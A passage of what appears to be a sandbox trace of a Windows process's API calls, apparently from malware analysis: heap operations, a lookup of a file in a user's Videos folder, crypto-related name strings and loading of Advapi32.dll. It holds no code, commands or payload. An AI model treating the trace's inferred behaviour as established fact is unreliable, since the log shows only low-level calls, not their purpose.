Size=0x10) returned 0x2e50cf8 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0258.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0258.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0258.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0258.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0258.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.802] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/XujfB_EFQdQYTzBm8.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4974c0, ftCreationTime.dwHighDateTime=0x1d5e88c, ftLastAccessTime.dwLowDateTime=0x8b491040, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x8b491040, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x2bd9, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="XujfB_EFQdQYTzBm8.flv", cAlternateFileName="XUJFB_~1.FLV")) returned 0xa87690 [0258.802] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0258.804] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0258.804] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d18 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0258.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d18 | out: hHeap=0x970000) returned 1 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.804] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0258.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0258.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0258.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0258.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0258.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0258.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.806] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.806] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0258.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0258.806] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0258.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.807] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0258.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0258.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0258.807] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0258.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0258.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0258.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0258.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0258.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0258.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0258.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0258.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0258.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0258.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d18 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0258.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d18 | out: hHeap=0x970000) returned 1 [0258.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.811] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0258.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0258.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0258.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: 